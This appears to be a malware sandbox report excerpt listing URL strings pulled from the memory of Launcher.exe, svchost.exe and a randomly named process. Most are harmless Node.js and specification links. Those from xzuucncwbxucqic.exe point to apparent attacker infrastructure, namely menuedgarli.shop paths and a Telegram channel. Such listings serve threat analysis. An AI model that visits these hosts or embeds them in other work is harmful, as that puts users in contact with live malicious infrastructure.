                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/38248
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/38433#issuecomment-828426932
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/38614)
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/standard-things/esm/issues/821.
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/tc39/ecma262/issues/1209
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/tc39/proposal-weakrefs
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://goo.gl/t5IS6M).
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://heycam.github.io/webidl/#Replaceable
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://heycam.github.io/webidl/#es-iterable
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://heycam.github.io/webidl/#es-iterators
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://heycam.github.io/webidl/#es-operations
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1562259858.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1756162409.00000000015D7000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2384478764.00000000015D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64-decode
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://invisible-island.net/xterm/ctlseqs/ctlseqs.html
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://jimmy.warting.se/opensource
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://linux.die.net/man/1/dircolors).
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.2384299612.0000000001548000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2384478764.00000000015D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/AUIqn
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.2381772054.0000000001599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/AUIqn)
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1756162409.00000000015D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/AUIqnl
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.2384299612.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/AUIqnq
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/M4
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/eE4
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1713028166.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/s
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1713028166.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop/sU4
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1562316522.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://menuedgarli.shop:443/AUIqn
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://no-color.org/
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/fs.html
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/node-v16.20.2-headers.tar.gz
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/node-v16.20.2.tar.gz
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/node-v16.20.2.tar.gzhttps://nodejs.org/download/release
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/win-x86/node.lib
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/en/docs/inspector
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/en/docs/inspectorFor
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/static/images/favicons/favicon.ico
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/static/images/favicons/favicon.iconodedevtoolsFrontendUrldevtoolsFrontendUrlCompa
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html).
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://sourcemaps.info/spec.html
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://stackoverflow.com/a/5501711/3561
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1424623663.0000000001587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/asdawfq
                      Source: svchost.exe, 00000001.00000003.1365965883.000001A164E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 00000001.00000002.1366712634.000001A164E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000001.00000002.1366712634.000001A164E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000001.00000002.1366687825.000001A164E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
                      Source: svchost.exe, 00000001.00000003.1365642107.000001A164E63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366840961.000001A164E64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#special-scheme
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url-serializing
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://v8.dev/blog/v8-release-89
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-mark-resource-timing
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-setup-the-resource-timing-entry
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1424697128.0000000001554000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1424623663.0000000001587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1424697128.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=57b9635b1734ac47b1_164579754652
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1424697128.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgX-Frame-OptionsALLOW-FROM
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1756162409.00000000015D7000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2384478764.00000000015D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-timeclip
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Alternative
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Atom
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClass
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscape
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscape
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetter
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalDigits
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscape
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Disjunction
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digits
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigit
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigits
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexEscapeSequence
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRanges
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-OctalDigit
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Pattern
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-PatternCharacter
